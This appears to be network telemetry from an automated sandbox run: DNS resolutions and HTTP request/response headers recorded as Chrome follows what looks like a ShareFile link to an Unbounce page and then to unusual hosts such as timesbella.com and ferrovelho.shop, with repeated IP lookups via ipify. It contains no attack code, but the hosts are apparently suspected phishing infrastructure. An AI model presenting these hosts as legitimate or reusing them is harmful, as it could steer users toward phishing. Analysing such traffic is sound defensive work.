                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.793220997 CEST1.1.1.1192.168.2.60xa22eNo error (0)citrix-sharefile-content.customer.pendo.io5352587489443840-content.customer.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.793220997 CEST1.1.1.1192.168.2.60xa22eNo error (0)5352587489443840-content.customer.pendo.iocdn-cname.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.793220997 CEST1.1.1.1192.168.2.60xa22eNo error (0)cdn-cname.pendo.io51.138.111.34.bc.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.852592945 CEST1.1.1.1192.168.2.60xbbacNo error (0)citrix-sharefile-content.customer.pendo.io5352587489443840-content.customer.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.852592945 CEST1.1.1.1192.168.2.60xbbacNo error (0)5352587489443840-content.customer.pendo.iocdn-cname.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.852592945 CEST1.1.1.1192.168.2.60xbbacNo error (0)cdn-cname.pendo.io51.138.111.34.bc.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.852592945 CEST1.1.1.1192.168.2.60xbbacNo error (0)51.138.111.34.bc.googleusercontent.com34.111.138.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:12.304563046 CEST1.1.1.1192.168.2.60x883bNo error (0)o49063.ingest.sentry.io34.120.195.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:12.619061947 CEST1.1.1.1192.168.2.60x58b7No error (0)piletfeed-cdn.sharefile.io13.224.189.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:12.619061947 CEST1.1.1.1192.168.2.60x58b7No error (0)piletfeed-cdn.sharefile.io13.224.189.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:12.619061947 CEST1.1.1.1192.168.2.60x58b7No error (0)piletfeed-cdn.sharefile.io13.224.189.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:12.619061947 CEST1.1.1.1192.168.2.60x58b7No error (0)piletfeed-cdn.sharefile.io13.224.189.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:29.673940897 CEST1.1.1.1192.168.2.60xde1eNo error (0)events.launchdarkly.com52.23.25.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:29.673940897 CEST1.1.1.1192.168.2.60xde1eNo error (0)events.launchdarkly.com54.146.120.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:29.673940897 CEST1.1.1.1192.168.2.60xde1eNo error (0)events.launchdarkly.com35.173.160.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:29.673940897 CEST1.1.1.1192.168.2.60xde1eNo error (0)events.launchdarkly.com18.233.115.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:29.673940897 CEST1.1.1.1192.168.2.60xde1eNo error (0)events.launchdarkly.com52.20.210.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:29.673940897 CEST1.1.1.1192.168.2.60xde1eNo error (0)events.launchdarkly.com34.196.144.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:29.673940897 CEST1.1.1.1192.168.2.60xde1eNo error (0)events.launchdarkly.com52.87.118.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:29.673940897 CEST1.1.1.1192.168.2.60xde1eNo error (0)events.launchdarkly.com18.209.243.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:29.692562103 CEST1.1.1.1192.168.2.60xc1faNo error (0)js-agent.newrelic.com162.247.243.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:30.601169109 CEST1.1.1.1192.168.2.60xce2No error (0)js-agent.newrelic.com162.247.243.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:31.419574022 CEST1.1.1.1192.168.2.60x79e2No error (0)bam.nr-data.netbam.cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:31.419574022 CEST1.1.1.1192.168.2.60x79e2No error (0)bam.cell.nr-data.netfastly-tls12-bam.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:31.420831919 CEST1.1.1.1192.168.2.60x85e0No error (0)bam.nr-data.netbam.cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:31.420831919 CEST1.1.1.1192.168.2.60x85e0No error (0)bam.cell.nr-data.netfastly-tls12-bam.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:31.420831919 CEST1.1.1.1192.168.2.60x85e0No error (0)fastly-tls12-bam.nr-data.net162.247.243.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:32.231275082 CEST1.1.1.1192.168.2.60x1299No error (0)bam.nr-data.netbam.cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:32.231275082 CEST1.1.1.1192.168.2.60x1299No error (0)bam.cell.nr-data.netfastly-tls12-bam.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:32.231275082 CEST1.1.1.1192.168.2.60x1299No error (0)fastly-tls12-bam.nr-data.net162.247.243.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:32.231760025 CEST1.1.1.1192.168.2.60xfdb3No error (0)bam.nr-data.netbam.cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:32.231760025 CEST1.1.1.1192.168.2.60xfdb3No error (0)bam.cell.nr-data.netbam.nr-data.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:32.357976913 CEST1.1.1.1192.168.2.60x56feNo error (0)citrix-sharefile-data.customer.pendo.io5352587489443840-data.customer.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:32.357976913 CEST1.1.1.1192.168.2.60x56feNo error (0)5352587489443840-data.customer.pendo.iocname.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:32.357976913 CEST1.1.1.1192.168.2.60x56feNo error (0)cname.pendo.io85.204.107.34.bc.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:32.381448030 CEST1.1.1.1192.168.2.60xb7b0No error (0)citrix-sharefile-data.customer.pendo.io5352587489443840-data.customer.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:32.381448030 CEST1.1.1.1192.168.2.60xb7b0No error (0)5352587489443840-data.customer.pendo.iocname.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:32.381448030 CEST1.1.1.1192.168.2.60xb7b0No error (0)cname.pendo.io85.204.107.34.bc.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:32.381448030 CEST1.1.1.1192.168.2.60xb7b0No error (0)85.204.107.34.bc.googleusercontent.com34.107.204.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:33.199800968 CEST1.1.1.1192.168.2.60x6d4fNo error (0)citrix-sharefile-data.customer.pendo.io5352587489443840-data.customer.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:33.199800968 CEST1.1.1.1192.168.2.60x6d4fNo error (0)5352587489443840-data.customer.pendo.iocname.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:33.199800968 CEST1.1.1.1192.168.2.60x6d4fNo error (0)cname.pendo.io85.204.107.34.bc.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:33.199800968 CEST1.1.1.1192.168.2.60x6d4fNo error (0)85.204.107.34.bc.googleusercontent.com34.107.204.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:33.206981897 CEST1.1.1.1192.168.2.60x53daNo error (0)citrix-sharefile-data.customer.pendo.io5352587489443840-data.customer.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:33.206981897 CEST1.1.1.1192.168.2.60x53daNo error (0)5352587489443840-data.customer.pendo.iocname.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:33.206981897 CEST1.1.1.1192.168.2.60x53daNo error (0)cname.pendo.io85.204.107.34.bc.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:36.495707989 CEST1.1.1.1192.168.2.60xf1e4No error (0)sf-cv.sharefile.com76.223.1.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:36.495707989 CEST1.1.1.1192.168.2.60xf1e4No error (0)sf-cv.sharefile.com13.248.193.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:39.038657904 CEST1.1.1.1192.168.2.60x80bcNo error (0)sf-cv.sharefile.com76.223.1.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:39.038657904 CEST1.1.1.1192.168.2.60x80bcNo error (0)sf-cv.sharefile.com13.248.193.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:46.377934933 CEST1.1.1.1192.168.2.60x4b0fNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:46.377934933 CEST1.1.1.1192.168.2.60x4b0fNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:46.377934933 CEST1.1.1.1192.168.2.60x4b0fNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:46.379950047 CEST1.1.1.1192.168.2.60xfcc1No error (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:46.389928102 CEST1.1.1.1192.168.2.60xe869No error (0)sf-renderx-us-east-1.sharefile.com15.197.239.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:46.389928102 CEST1.1.1.1192.168.2.60xe869No error (0)sf-renderx-us-east-1.sharefile.com3.33.222.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:47.053692102 CEST1.1.1.1192.168.2.60x6aaeNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:47.053692102 CEST1.1.1.1192.168.2.60x6aaeNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:47.053692102 CEST1.1.1.1192.168.2.60x6aaeNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:47.054857016 CEST1.1.1.1192.168.2.60x674aNo error (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:47.168813944 CEST1.1.1.1192.168.2.60xdd65No error (0)sf-renderx-us-east-1.sharefile.com3.33.222.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:47.168813944 CEST1.1.1.1192.168.2.60xdd65No error (0)sf-renderx-us-east-1.sharefile.com15.197.239.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:49.369560003 CEST1.1.1.1192.168.2.60x8ad3No error (0)sf-temp-us-east-1-production.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:49.369560003 CEST1.1.1.1192.168.2.60x8ad3No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:49.374058008 CEST1.1.1.1192.168.2.60x3f14No error (0)sf-temp-us-east-1-production.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:49.374058008 CEST1.1.1.1192.168.2.60x3f14No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:49.374058008 CEST1.1.1.1192.168.2.60x3f14No error (0)s3-w.us-east-1.amazonaws.com52.217.235.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:49.374058008 CEST1.1.1.1192.168.2.60x3f14No error (0)s3-w.us-east-1.amazonaws.com52.216.52.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:49.374058008 CEST1.1.1.1192.168.2.60x3f14No error (0)s3-w.us-east-1.amazonaws.com52.217.137.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:49.374058008 CEST1.1.1.1192.168.2.60x3f14No error (0)s3-w.us-east-1.amazonaws.com52.217.124.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:49.374058008 CEST1.1.1.1192.168.2.60x3f14No error (0)s3-w.us-east-1.amazonaws.com52.216.29.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:49.374058008 CEST1.1.1.1192.168.2.60x3f14No error (0)s3-w.us-east-1.amazonaws.com52.217.234.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:49.374058008 CEST1.1.1.1192.168.2.60x3f14No error (0)s3-w.us-east-1.amazonaws.com3.5.11.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:49.374058008 CEST1.1.1.1192.168.2.60x3f14No error (0)s3-w.us-east-1.amazonaws.com54.231.192.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:53.512286901 CEST1.1.1.1192.168.2.60x19a5No error (0)storage-cf-us.sharefile.comd274vr1q96ipg8.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:53.512286901 CEST1.1.1.1192.168.2.60x19a5No error (0)d274vr1q96ipg8.cloudfront.net18.173.205.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:53.512286901 CEST1.1.1.1192.168.2.60x19a5No error (0)d274vr1q96ipg8.cloudfront.net18.173.205.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:53.512286901 CEST1.1.1.1192.168.2.60x19a5No error (0)d274vr1q96ipg8.cloudfront.net18.173.205.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:53.512286901 CEST1.1.1.1192.168.2.60x19a5No error (0)d274vr1q96ipg8.cloudfront.net18.173.205.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:53.567415953 CEST1.1.1.1192.168.2.60xd6e2No error (0)storage-cf-us.sharefile.comd274vr1q96ipg8.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:28.438381910 CEST1.1.1.1192.168.2.60x5186No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:28.438381910 CEST1.1.1.1192.168.2.60x5186No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:35.149908066 CEST1.1.1.1192.168.2.60xeb10No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:48.977041006 CEST1.1.1.1192.168.2.60x3616No error (0)unbouncepages.com104.18.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:48.977041006 CEST1.1.1.1192.168.2.60x3616No error (0)unbouncepages.com172.64.153.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:48.977669001 CEST1.1.1.1192.168.2.60x5b42No error (0)unbouncepages.com104.18.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:48.977669001 CEST1.1.1.1192.168.2.60x5b42No error (0)unbouncepages.com172.64.153.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.518358946 CEST1.1.1.1192.168.2.60x1effNo error (0)www.google.com142.250.181.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.518742085 CEST1.1.1.1192.168.2.60xa95cNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.760731936 CEST1.1.1.1192.168.2.60xb282No error (0)builder-assets.unbounce.com13.224.189.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.760731936 CEST1.1.1.1192.168.2.60xb282No error (0)builder-assets.unbounce.com13.224.189.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.760731936 CEST1.1.1.1192.168.2.60xb282No error (0)builder-assets.unbounce.com13.224.189.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.760731936 CEST1.1.1.1192.168.2.60xb282No error (0)builder-assets.unbounce.com13.224.189.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.521284103 CEST1.1.1.1192.168.2.60xaa90No error (0)unbouncepages.com172.64.153.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.521284103 CEST1.1.1.1192.168.2.60xaa90No error (0)unbouncepages.com104.18.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.737221003 CEST1.1.1.1192.168.2.60xe00aNo error (0)hvhuo1.timesbella.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.739206076 CEST1.1.1.1192.168.2.60x68feNo error (0)hvhuo1.timesbella.com104.21.89.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.739206076 CEST1.1.1.1192.168.2.60x68feNo error (0)hvhuo1.timesbella.com172.67.157.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.781439066 CEST1.1.1.1192.168.2.60x828fNo error (0)hvhuo1.timesbella.com172.67.157.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.781439066 CEST1.1.1.1192.168.2.60x828fNo error (0)hvhuo1.timesbella.com104.21.89.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.934890985 CEST1.1.1.1192.168.2.60xdb60No error (0)hvhuo1.timesbella.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.353132010 CEST1.1.1.1192.168.2.60xe680No error (0)builder-assets.unbounce.com13.224.189.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.353132010 CEST1.1.1.1192.168.2.60xe680No error (0)builder-assets.unbounce.com13.224.189.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.353132010 CEST1.1.1.1192.168.2.60xe680No error (0)builder-assets.unbounce.com13.224.189.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.353132010 CEST1.1.1.1192.168.2.60xe680No error (0)builder-assets.unbounce.com13.224.189.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:56.648638010 CEST1.1.1.1192.168.2.60x3ce7No error (0)hrv56k8ryi.ferrovelho.shop203.161.61.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:58.245081902 CEST1.1.1.1192.168.2.60x9b3bNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:58.245603085 CEST1.1.1.1192.168.2.60x4a8cNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:59.235404968 CEST1.1.1.1192.168.2.60x4264No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:59.426737070 CEST1.1.1.1192.168.2.60x4435No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:59.426773071 CEST1.1.1.1192.168.2.60xef2eNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:06.422183037 CEST1.1.1.1192.168.2.60x269No error (0)hrv56k8ryi.ferrovelho.shop203.161.61.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:07.862472057 CEST1.1.1.1192.168.2.60xb69eNo error (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:07.864167929 CEST1.1.1.1192.168.2.60xdb5fNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:07.864167929 CEST1.1.1.1192.168.2.60xdb5fNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:07.864167929 CEST1.1.1.1192.168.2.60xdb5fNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:10.236679077 CEST1.1.1.1192.168.2.60x6dcbNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:10.236679077 CEST1.1.1.1192.168.2.60x6dcbNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:10.236679077 CEST1.1.1.1192.168.2.60x6dcbNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:10.237864017 CEST1.1.1.1192.168.2.60x7c20No error (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:22.379268885 CEST1.1.1.1192.168.2.60x3561No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:41.167897940 CEST1.1.1.1192.168.2.60xece8No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:57.969077110 CEST1.1.1.1192.168.2.60x1No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                0192.168.2.650263104.18.34.21805924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:51.843107939 CEST447OUTGET /99392004001023/ HTTP/1.1
                                                                                                                                                                                                                                                                                Host: unbouncepages.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                1192.168.2.650264104.18.34.21805924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.511301994 CEST473OUTGET /99392004001023/ HTTP/1.1
                                                                                                                                                                                                                                                                                Host: unbouncepages.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.668282032 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:06:53 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                Content-Length: 1729
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                set-cookie: ubvs=984ef446-4894-43d3-86b3-f7f03d0fb80e; Max-Age=15552000; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                content-location: http://unbouncepages.com/99392004001023/
                                                                                                                                                                                                                                                                                etag: "a:984ef446489443d386b3f7f03d0fb80e"
                                                                                                                                                                                                                                                                                link: <http://unbouncepages.com/99392004001023/>; rel="canonical"
                                                                                                                                                                                                                                                                                x-unbounce-pageid: c0c7e975-1edd-476a-8c6c-b9c3f18a8012
                                                                                                                                                                                                                                                                                x-unbounce-variant: a
                                                                                                                                                                                                                                                                                x-unbounce-visitorid: 984ef446-4894-43d3-86b3-f7f03d0fb80e
                                                                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                Set-Cookie: ubvt=v2%7C984ef446-4894-43d3-86b3-f7f03d0fb80e%7Cc0c7e975-1edd-476a-8c6c-b9c3f18a8012%3Aa%3Asingle%3Asingle; Max-Age=259200; Domain=unbouncepages.com; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                Set-Cookie: ubpv=a%2Cc0c7e975-1edd-476a-8c6c-b9c3f18a8012; Max-Age=15897600; Path=/99392004001023/; SameSite=Lax
                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=na6y8zAWEEPd_WLfIs3pLGcfi8Vd1ydOe7voOG5uk04-1728497213-1.0.1.1-EYMXS1taezGgDDe3SggsgK5J86VdxHU_mJBouxY9Uxucl4vkgcCZjQD6GuXseSnmOSL3savSTNGz2ucgc_iq.Q; path=/; expires=Wed, 09-Oct-24 18:36:53 GMT; domain=.unbouncepages.com; HttpOnly
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
